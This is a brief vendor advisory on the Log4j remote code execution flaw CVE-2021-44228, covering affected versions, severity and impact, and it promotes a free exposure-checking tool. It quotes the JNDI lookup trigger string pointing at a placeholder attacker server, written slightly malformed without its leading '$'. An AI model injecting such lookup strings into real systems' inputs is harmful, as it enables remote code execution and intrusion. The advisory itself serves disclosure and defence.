Log4j vulnerability, CVE-2021-44228, became public on December 9, 2021.
This easily triggered log4j vulnerability can be used to gain RCE (remote code execution) in vulnerable systems when the Apache Log4j utility is used. Other Apache products are vulnerable as well, such as Apache Solr.
Log4j is easily triggered just by log a special string {jndi:ldap://<attacker’s server>/a}; it impacts Apache Log4j version 2.0-beta9 to 2.15.0-rc, and is common in enterprise software and cloud servers across industry. Unless fixed, it enables easy access to internal networks that can end up with valuable data theft, malware implementation, crucial information deletion, and more.
This vulnerability is so critical, that it received the rare 10 out of 10 CVSS scores.
Fortunately, not everyone is affected, and mitigation can be easily applied, but first, it is recommended to check if you have been exposed to log4j easily, using Findings’ log4j free VDaaS tool.
For more information, feel free to visit our log4j information page